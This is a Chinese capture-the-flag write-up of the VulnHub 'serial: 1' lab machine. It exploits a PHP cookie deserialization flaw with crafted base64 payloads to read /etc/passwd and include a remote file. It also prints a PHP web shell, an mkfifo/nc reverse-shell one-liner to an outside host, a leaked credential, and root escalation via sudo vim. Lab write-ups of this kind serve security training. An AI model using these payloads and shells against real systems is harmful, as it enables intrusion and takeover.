本文作者:eth10(贝塔安全实验室-核心成员)
0x01:靶机下载地址
https://www.vulnhub.com/entry/serial-1,349/,如何搭建靶机,请自行百度!
请输入ip:192.168.25.0/24
请输入线程数(默认1000):255
192.168.25.1
192.168.25.139请输入IP:192.168.25.139
请输入端口(默认常规端口):
请输入线程数(默认1000):
请设置超时时间(默认3秒):
192.168.25.139:22
192.168.25.139:80
done: 0.05
退出 Press Enter0x04:访问web服务
页面只有一行文本Hello sk4This is a beta test for new cookie handler 通过bp截断看到如下数据包:
GET / HTTP/1.1
Host: 192.168.25.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0%3D
Upgrade-Insecure-Requests: 1HTTP/1.1 200 OK
Date: Sun, 08 Sep 2019 12:41:42 GMT
Server: Apache/2.4.38 (Ubuntu)
Content-Length: 52
Connection: close
Content-Type: text/html; charset=UTF-8</small>
Hello sk4This is a beta test for new cookie handler发现cookie进行了base64编码了,进行解码如下:
O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}
o:代表存储的是对象(object),如果传入的是一个数组,那它会变成字母a。
4:表示对象的名称有4个字符。User表示对象名称,刚好是4个字符。
2:表示有2个值
s:表示字符串,数字表示字符串的长度,s:10:" User name";思路一
将user换成admin,尝试能否绕过
O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:7:"Welcome":0:{}}
Tzo0OiJVc2VyIjoyOntzOjEwOiIgVXNlciBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IiBVc2VyIHdlbCI7Tzo3OiJXZWxjb21lIjowOnt9fQ%3D%3D结果出现错误
HTTP/1.0 500 Internal Server Error
Date: Sun, 08 Sep 2019 12:43:44 GMT
Server: Apache/2.4.38 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8思路二
目录扫描
访问发现服务器开启了目录索引功能,导致出现目录浏览漏洞,通过目录浏览功能可直接访问或下载相关文件!
C:Userseth10Documents靶机bak>dir /b
index.php
log.class.php
user.class.php代码审计
C:Userseth10Documents靶机bak>cat index.php
<?php
include("user.class.php");</small>
if(!isset($_COOKIE['user'])) {
setcookie("user", base64_encode(serialize(new User('sk4'))));
} else {
unserialize(base64_decode($_COOKIE['user']));
}
echo "This is a beta test for new cookie handlern";
?>
C:Userseth10Documents靶机bak>cat log.class.php
<?php
class Log {
private $type_log;
function __costruct($hnd) {
$this->$type_log = $hnd;
}
public function handler($val) {
include($this->type_log);
echo "LOG: " . $val;
}
}
?>
C:Userseth10Documents靶机bak>cat user.class.php
<?php
include("log.class.php");
class Welcome {
public function handler($val) {
echo "Hello " . $val;
}
}
class User {
private $name;
private $wel;
function __construct($name) {
$this->name = $name;
$this->wel = new Welcome();
}
function __destruct() {
//echo "byen";
$this->wel->handler($this->name);
}
}
?>通过查看文件发现,index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码;
O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}</small>
O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:13:" Log type_log";s:11:"/etc/passwd";}}
O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}base64.b64encode(b'O:4:"User":2:{s:10:"x00Userx00name";s:5:"admin";s:9:"x00Userx00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ=='
getshell
>>> 'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}'.replace(' ','x00')
'O:4:"User":2:{s:10:"x00Userx00name";s:5:"admin";s:9:"x00Userx00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}'
>>> base64.b64encode(b'O:4:"User":2:{s:10:"x00Userx00name";s:5:"admin";s:9:"x00Userx00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.25.1/c.txt";}}')
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjI1LjEvYy50eHQiO319'
<?phpsystem($_GET['cmd']);?>
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.25.1+4444+>/tmp/f
0x05:提权
信息收集
查看系统信息,如操作系统版本,内核版本等信息!
$ uname -a
Linux sk4-VM 5.0.0-25-generic #26-Ubuntu SMP Thu Aug 1 12:04:58 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$
$ cat /etc/issue
Ubuntu 19.04 n l</small>
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 19.04
Release: 19.04
Codename: disco
$ cat /proc/version
Linux version 5.0.0-25-generic (buildd@lgw01-amd64-008) (gcc version 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #26-Ubuntu SMP Thu Aug 1 12:04:58 UTC 2019cat /etc/redhat-release,这种方法只适合Redhat系的Linux!
$ cat credentials.txt.bak
sk4:KywZmnPWW6tTbW5w
使用工具扫描一波:
https://github.com/rebootuser/LinEnum
[-] SUID files:
-rwsr-xr-x 1 root root 40152 mag 16 2018 /snap/core/6673/bin/mount
-rwsr-xr-x 1 root root 44168 mag 7 2014 /snap/core/6673/bin/ping
-rwsr-xr-x 1 root root 44680 mag 7 2014 /snap/core/6673/bin/ping6
-rwsr-xr-x 1 root root 40128 mag 17 2017 /snap/core/6673/bin/su
-rwsr-xr-x 1 root root 39904 mag 17 2017 /snap/core/6673/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 mag 17 2017 /snap/core/6673/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 lug 4 2017 /snap/core/6673/usr/bin/sudo
-rwsr-xr-x 1 root root 44168 mag 7 2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 mag 7 2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 mar 25 13:09 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 mag 15 22:43 /snap/core/7396/bin/umount
-rwsr-xr-- 1 root dip 394984 giu 12 2018 /snap/core/7396/usr/sbin/pppd
-rwsr-xr-x 1 root root 43088 ott 15 2018 /snap/core18/1074/bin/mount
-rwsr-xr-x 1 root root 64424 giu 28 13:05 /snap/core18/1074/bin/ping
-rwsr-xr-x 1 root root 44664 mar 22 20:05 /snap/core18/1074/bin/su
-rwsr-xr-x 1 root root 26696 ott 15 2018 /snap/core18/1074/bin/umount
-rwsr-xr-x 1 root root 76496 mar 22 20:05 /snap/core18/1074/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 mar 22 20:05 /snap/core18/1074/usr/bin/chsh
-rwsr-xr-x 1 root root 149080 gen 18 2018 /snap/core18/1074/usr/bin/sudo
-rwsr-xr-- 1 root dip 386792 mar 15 13:18 /usr/sbin/pppd
-rwsr-xr-x 1 root root 63568 feb 22 2019 /usr/bin/su
-rwsr-xr-x 1 root root 80592 mar 22 19:32 /usr/bin/chfn
-rwsr-xr-x 1 root root 34896 mar 5 2019 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44528 mar 22 19:32 /usr/bin/chsh
-rwsr-xr-x 1 root root 47184 feb 22 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 63736 mar 22 19:32 /usr/bin/passwd
-rwsr-xr-x 1 root root 34888 feb 22 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 84016 mar 22 19:32 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 26616 gen 15 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44440 mar 22 19:32 /usr/bin/newgrp
-rwsr-xr-x 1 root root 157192 feb 19 2019 /usr/bin/sudo</small>
[-] SGID files:sk4@sk4-VM:/tmp$ ./linux-exploit-suggester.sh</small>
Available information:
Kernel version: 5.0.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 19.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
34 user space exploits
Possible Exploits:
[+] [CVE-2009-1185] udev 2
Details: https://www.exploit-db.com/exploits/8478/
Download URL: https://www.exploit-db.com/download/8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Tags: ubuntu=16.04|16.10,debian=7|8
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.使用CVE-2009-1185进行提权
sk4@sk4-VM:/tmp$ chmod 777 8478.sh
sk4@sk4-VM:/tmp$ ./8478.sh
-bash: ./8478.sh: /bin/sh^M: bad interpreter: No such file or directory失败
发现vim对所有用户NOPASSWD,那试试看sudo vim,进入到命令模式输入!bash
0x06:反序列化参考文章
本文作者:贝塔安全实验室
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/196076.html
必填 您当前尚未登录。 登录? 注册
必填(保密)